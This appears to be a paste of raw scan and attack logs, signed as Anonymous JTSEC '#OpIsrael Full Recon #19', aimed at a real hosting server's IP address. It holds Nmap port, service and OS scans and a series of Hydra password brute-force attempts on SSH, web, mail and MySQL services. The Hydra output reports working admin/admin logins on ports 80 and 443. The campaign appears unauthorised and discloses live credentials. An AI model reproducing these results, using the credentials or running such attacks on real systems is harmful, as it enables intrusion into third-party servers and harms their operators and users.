- NSE: Loaded 148 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 00:22
- Completed NSE at 00:22, 0.00s elapsed
- Initiating NSE at 00:22
- Completed NSE at 00:22, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 00:22
- Completed Parallel DNS resolution of 1 host. at 00:22, 16.51s elapsed
- Initiating SYN Stealth Scan at 00:22
- Scanning 173.237.136.21 [474 ports]
- Discovered open port 80/tcp on 173.237.136.21
- Discovered open port 993/tcp on 173.237.136.21
- Discovered open port 3306/tcp on 173.237.136.21
- Discovered open port 53/tcp on 173.237.136.21
- Discovered open port 22/tcp on 173.237.136.21
- Discovered open port 143/tcp on 173.237.136.21
- Discovered open port 587/tcp on 173.237.136.21
- Discovered open port 995/tcp on 173.237.136.21
- Discovered open port 110/tcp on 173.237.136.21
- Discovered open port 21/tcp on 173.237.136.21
- Discovered open port 443/tcp on 173.237.136.21
- Discovered open port 8080/tcp on 173.237.136.21
- Discovered open port 465/tcp on 173.237.136.21
- Discovered open port 8443/tcp on 173.237.136.21
- Completed SYN Stealth Scan at 00:22, 4.55s elapsed (474 total ports)
- Initiating Service scan at 00:22
- Scanning 14 services on 173.237.136.21
- Completed Service scan at 00:22, 33.92s elapsed (14 services on 1 host)
- Initiating OS detection (try #1) against 173.237.136.21
- Retrying OS detection (try #2) against 173.237.136.21
- WARNING: OS didn't match until try #2
- Initiating Traceroute at 00:23
- Completed Traceroute at 00:23, 0.22s elapsed
- Initiating Parallel DNS resolution of 2 hosts. at 00:23
- Completed Parallel DNS resolution of 2 hosts. at 00:23, 16.50s elapsed
- NSE: Script scanning 173.237.136.21.
- Initiating NSE at 00:23
- Completed NSE at 00:25, 140.31s elapsed
- Initiating NSE at 00:25
- Completed NSE at 00:25, 0.46s elapsed
- Nmap scan report for 173.237.136.21
- Host is up (0.13s latency).
- Not shown: 457 closed ports
- PORT STATE SERVICE VERSION
- 21/tcp open ftp Pure-FTPd
- | ssl-cert: Subject: commonName=uscentral22.myserverhosts.com
- | Subject Alternative Name: DNS:uscentral22.myserverhosts.com, DNS:www.uscentral22.myserverhosts.com
- | Issuer: commonName=cPanel, Inc. Certification Authority/organizationName=cPanel, Inc./stateOrProvinceName=TX/countryName=US
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2018-05-03T00:00:00
- | Not valid after: 2019-05-03T23:59:59
- | MD5: 9f53 7598 7aaa 4c71 27d6 9681 bf06 a492
- |_SHA-1: 6541 4f83 18e9 cf69 13af ee68 e216 d3ae 10c8 0254
- |_ssl-date: 2018-11-23T05:23:22+00:00; 0s from scanner time.
- 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
- | ssh-hostkey:
- | 1024 cc:18:eb:be:f1:bf:95:33:27:e7:9d:46:4b:f7:5e:51 (DSA)
- |_ 2048 02:20:0f:ee:ae:39:1e:aa:8c:36:e5:00:af:2f:43:ff (RSA)
- 23/tcp filtered telnet
- 53/tcp open domain?
- 80/tcp open http-proxy Squid http proxy
- | http-methods:
- |_ Supported Methods: GET HEAD POST OPTIONS
- |_http-open-proxy: Proxy might be redirecting requests
- |_http-title: Site doesn't have a title (text/html).
- 110/tcp open pop3 Dovecot pop3d
- |_pop3-capabilities: CAPA UIDL PIPELINING SASL(PLAIN LOGIN) USER TOP STLS AUTH-RESP-CODE RESP-CODES
- |_ssl-date: 2018-11-23T05:23:25+00:00; 0s from scanner time.
- 143/tcp open imap Dovecot imapd
- |_imap-capabilities: LITERAL+ listed ENABLE IDLE NAMESPACE LOGIN-REFERRALS Pre-login capabilities post-login ID SASL-IR have OK AUTH=LOGINA0001 AUTH=PLAIN more STARTTLS IMAP4rev1
- |_ssl-date: 2018-11-23T05:23:23+00:00; 0s from scanner time.
- 443/tcp open ssl/http nginx 1.14.0
- | http-methods:
- |_ Supported Methods: GET HEAD POST OPTIONS
- |_http-server-header: nginx/1.14.0
- |_http-title: Site doesn't have a title (text/html).
- | ssl-cert: Subject: commonName=*.myserverhosts.com
- | Subject Alternative Name: DNS:*.myserverhosts.com, DNS:myserverhosts.com
- | Issuer: commonName=COMODO RSA Domain Validation Secure Server CA/organizationName=COMODO CA Limited/stateOrProvinceName=Greater Manchester/countryName=GB
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2018-06-08T00:00:00
- | Not valid after: 2020-06-08T23:59:59
- | MD5: d50b 913b c6d7 bcf1 bc54 97e6 d7d0 8e27
- |_SHA-1: 8930 1ed8 2100 fbd7 64e3 0901 b2f0 8d18 81e4 09c8
- |_ssl-date: 2018-11-23T05:23:18+00:00; 0s from scanner time.
- | tls-nextprotoneg:
- | h2
- |_ http/1.1
- 465/tcp open ssl/smtp Exim smtpd 4.91
- |_smtp-commands: Couldn't establish connection on port 465
- | ssl-cert: Subject: commonName=uscentral22.myserverhosts.com
- | Subject Alternative Name: DNS:uscentral22.myserverhosts.com, DNS:www.uscentral22.myserverhosts.com
- | Issuer: commonName=cPanel, Inc. Certification Authority/organizationName=cPanel, Inc./stateOrProvinceName=TX/countryName=US
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2018-05-03T00:00:00
- | Not valid after: 2019-05-03T23:59:59
- | MD5: 9f53 7598 7aaa 4c71 27d6 9681 bf06 a492
- |_SHA-1: 6541 4f83 18e9 cf69 13af ee68 e216 d3ae 10c8 0254
- |_ssl-date: 2018-11-23T05:23:18+00:00; 0s from scanner time.
- 587/tcp open smtp Exim smtpd 4.91
- | smtp-commands: uscentral22.myserverhosts.com Hello nmap.scanme.org [185.244.213.149], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
- |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
- | ssl-cert: Subject: commonName=uscentral22.myserverhosts.com
- | Subject Alternative Name: DNS:uscentral22.myserverhosts.com, DNS:www.uscentral22.myserverhosts.com
- | Issuer: commonName=cPanel, Inc. Certification Authority/organizationName=cPanel, Inc./stateOrProvinceName=TX/countryName=US
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2018-05-03T00:00:00
- | Not valid after: 2019-05-03T23:59:59
- | MD5: 9f53 7598 7aaa 4c71 27d6 9681 bf06 a492
- |_SHA-1: 6541 4f83 18e9 cf69 13af ee68 e216 d3ae 10c8 0254
- |_ssl-date: 2018-11-23T05:23:20+00:00; 0s from scanner time.
- 993/tcp open ssl/imaps?
- |_ssl-date: 2018-11-23T05:23:18+00:00; 0s from scanner time.
- 995/tcp open ssl/pop3s?
- |_ssl-date: 2018-11-23T05:23:18+00:00; 0s from scanner time.
- 3306/tcp open mysql MySQL 5.5.51-38.2
- | mysql-info:
- | Protocol: 10
- | Version: 5.5.51-38.2
- | Thread ID: 34070279
- | Capabilities flags: 63487
- | Some Capabilities: LongColumnFlag, Support41Auth, Speaks41ProtocolOld, Speaks41ProtocolNew, FoundRows, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, InteractiveClient, SupportsTransactions, IgnoreSigpipes, DontAllowDatabaseTableColumn, LongPassword, SupportsLoadDataLocal, ODBCClient, SupportsCompression, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
- | Status: Autocommit
- | Salt: fCYt__?Z)YfwC)BOFQC;
- |_ Auth Plugin Name: 84
- 7777/tcp filtered cbt
- 8080/tcp open http nginx 1.14.0
- | http-methods:
- |_ Supported Methods: GET HEAD POST OPTIONS
- |_http-server-header: nginx/1.14.0
- |_http-title: Site doesn't have a title (text/html).
- 8443/tcp open ssl/http nginx 1.14.0
- | http-methods:
- |_ Supported Methods: GET HEAD POST OPTIONS
- |_http-server-header: nginx/1.14.0
- |_http-title: Site doesn't have a title (text/html).
- | ssl-cert: Subject: commonName=*.myserverhosts.com
- | Subject Alternative Name: DNS:*.myserverhosts.com, DNS:myserverhosts.com
- | Issuer: commonName=COMODO RSA Domain Validation Secure Server CA/organizationName=COMODO CA Limited/stateOrProvinceName=Greater Manchester/countryName=GB
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2018-06-08T00:00:00
- | Not valid after: 2020-06-08T23:59:59
- | MD5: d50b 913b c6d7 bcf1 bc54 97e6 d7d0 8e27
- |_SHA-1: 8930 1ed8 2100 fbd7 64e3 0901 b2f0 8d18 81e4 09c8
- |_ssl-date: 2018-11-23T05:23:23+00:00; 0s from scanner time.
- | tls-nextprotoneg:
- | h2
- |_ http/1.1
- 49152/tcp filtered unknown
- Device type: WAP|router|storage-misc
- Running: Linux 2.4.X|2.6.X, MikroTik RouterOS 5.X, Netgear RAIDiator 4.X
- OS CPE: cpe:/o:linux:linux_kernel:2.4.36 cpe:/o:mikrotik:routeros:5.25 cpe:/o:linux:linux_kernel:2.6.35 cpe:/o:netgear:raidiator:4.1.4
- OS details: DD-WRT v23 (Linux 2.4.36), MikroTik RouterOS 5.25 (Linux 2.6.35), Netgear ReadyNAS Duo NAS device (RAIDiator 4.1.4)
- Uptime guess: 301.013 days (since Fri Jan 26 00:07:11 2018)
- Network Distance: 2 hops
- Service Info: Host: uscentral22.myserverhosts.com
- TRACEROUTE (using port 25/tcp)
- HOP RTT ADDRESS
- 1 103.19 ms 10.251.200.1
- 2 103.15 ms 173.237.136.21
- NSE: Script Post-scanning.
- Initiating NSE at 00:25
- Completed NSE at 00:25, 0.00s elapsed
- Initiating NSE at 00:25
- Completed NSE at 00:25, 0.00s elapsed
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 218.42 seconds
- Raw packets sent: 599 (28.512KB) | Rcvd: 556 (25.098KB)
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:25 EST
- NSE: Loaded 148 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 00:25
- Completed NSE at 00:25, 0.00s elapsed
- Initiating NSE at 00:25
- Completed NSE at 00:25, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 00:25
- Completed Parallel DNS resolution of 1 host. at 00:25, 16.50s elapsed
- Initiating UDP Scan at 00:25
- Scanning 173.237.136.21 [14 ports]
- Discovered open port 53/udp on 173.237.136.21
- Completed UDP Scan at 00:26, 6.57s elapsed (14 total ports)
- Initiating Service scan at 00:26
- Scanning 1 service on 173.237.136.21
- Completed Service scan at 00:26, 15.02s elapsed (1 service on 1 host)
- Initiating OS detection (try #1) against 173.237.136.21
- Retrying OS detection (try #2) against 173.237.136.21
- Initiating Traceroute at 00:26
- Completed Traceroute at 00:26, 7.16s elapsed
- Initiating Parallel DNS resolution of 1 host. at 00:26
- Completed Parallel DNS resolution of 1 host. at 00:26, 16.50s elapsed
- NSE: Script scanning 173.237.136.21.
- Initiating NSE at 00:26
- Completed NSE at 00:26, 0.45s elapsed
- Initiating NSE at 00:26
- Completed NSE at 00:26, 0.00s elapsed
- Nmap scan report for 173.237.136.21
- Host is up (0.21s latency).
- PORT STATE SERVICE VERSION
- 53/udp open domain (generic dns response: FORMERR)
- | fingerprint-strings:
- | NBTStat:
- |_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
- 67/udp closed dhcps
- 68/udp closed dhcpc
- 69/udp closed tftp
- 88/udp closed kerberos-sec
- 123/udp closed ntp
- 137/udp filtered netbios-ns
- 138/udp filtered netbios-dgm
- 139/udp closed netbios-ssn
- 161/udp closed snmp
- 162/udp closed snmptrap
- 389/udp closed ldap
- 520/udp closed route
- 2049/udp closed nfs
- 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
- SF-Port53-UDP:V=7.70%I=7%D=11/23%Time=5BF78F6F%P=x86_64-pc-linux-gnu%r(DNS
- SF:VersionBindReq,C,"\0\x06\x81\x04\0\0\0\0\0\0\0\0")%r(DNSStatusRequest,C
- SF:,"\0\0\x90\x01\0\0\0\0\0\0\0\0")%r(NBTStat,32,"\x80\xf0\x80\x05\0\x01\0
- SF:\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01");
- Too many fingerprints match this host to give specific OS details
- Network Distance: 12 hops
- TRACEROUTE (using port 138/udp)
- HOP RTT ADDRESS
- 1 ... 2
- 3 102.71 ms 10.251.200.1
- 4 ... 5
- 6 104.13 ms 10.251.200.1
- 7 105.10 ms 10.251.200.1
- 8 105.09 ms 10.251.200.1
- 9 105.08 ms 10.251.200.1
- 10 105.05 ms 10.251.200.1
- 11 104.87 ms 10.251.200.1
- 12 104.87 ms 10.251.200.1
- 13 ... 18
- 19 103.61 ms 10.251.200.1
- 20 104.32 ms 10.251.200.1
- 21 103.29 ms 10.251.200.1
- 22 ... 29
- 30 104.00 ms 10.251.200.1
- NSE: Script Post-scanning.
- Initiating NSE at 00:26
- Completed NSE at 00:26, 0.00s elapsed
- Initiating NSE at 00:26
- Completed NSE at 00:26, 0.00s elapsed
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 66.50 seconds
- Raw packets sent: 124 (5.705KB) | Rcvd: 91 (8.627KB)
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:26 EST
- Nmap scan report for 173.237.136.21
- Host is up (0.20s latency).
- Not shown: 16 closed ports, 1 filtered port
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 443/tcp open https
- 993/tcp open imaps
- 3306/tcp open mysql
- 8080/tcp open http-proxy
- #######################################################################################################################################
- 1 of 1 target completed, 0 valid passwords found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 01:05:42
- + -- --=[Port 22 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 01:05:42
- [DATA] max 1 task per 1 server, overall 1 task, 363 login tries, ~363 tries per task
- [DATA] attacking ssh://173.237.136.21:22/
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 01:05:42
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking ssh://173.237.136.21:22/
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 80 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 01:05:43
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking http-get://173.237.136.21:80//
- [80][http-get] host: 173.237.136.21 login: admin password: admin
- [STATUS] attack finished for 173.237.136.21 (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 01:05:44
- + -- --=[Port 110 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- + -- --=[Port 443 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 08:08:48
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking http-gets://173.237.136.21:443//
- [443][http-get] host: 173.237.136.21 login: admin password: admin
- [STATUS] attack finished for 173.237.136.21 (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 08:08:49
- + -- --=[Port 445 closed... skipping.
- + -- --=[Port 512 closed... skipping.
- + -- --=[Port 513 closed... skipping.
- + -- --=[Port 514 closed... skipping.
- + -- --=[Port 993 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- 1 of 1 target completed, 0 valid passwords found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 15:59:55
- + -- --=[Port 1433 closed... skipping.
- + -- --=[Port 1521 closed... skipping.
- + -- --=[Port 3306 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 15:59:55
- [DATA] max 1 task per 1 server, overall 1 task, 78 login tries, ~78 tries per task
- [DATA] attacking mysql://173.237.136.21:3306/
- [STATUS] 50.00 tries/min, 50 tries in 00:01h, 28 to do in 00:01h, 1 active
- 1 of 1 target completed, 0 valid passwords found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 16:00:55
- + -- --=[Port 3389 closed... skipping.
- + -- --=[Port 5432 closed... skipping.
- + -- --=[Port 5900 closed... skipping.
- + -- --=[Port 5901 closed... skipping.
- + -- --=[Port 8000 closed... skipping.
- + -- --=[Port 8080 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- #######################################################################################################################################
- Anonymous JTSEC #OpIsrael Full Recon #19
Add Comment
Please, Sign In to add comment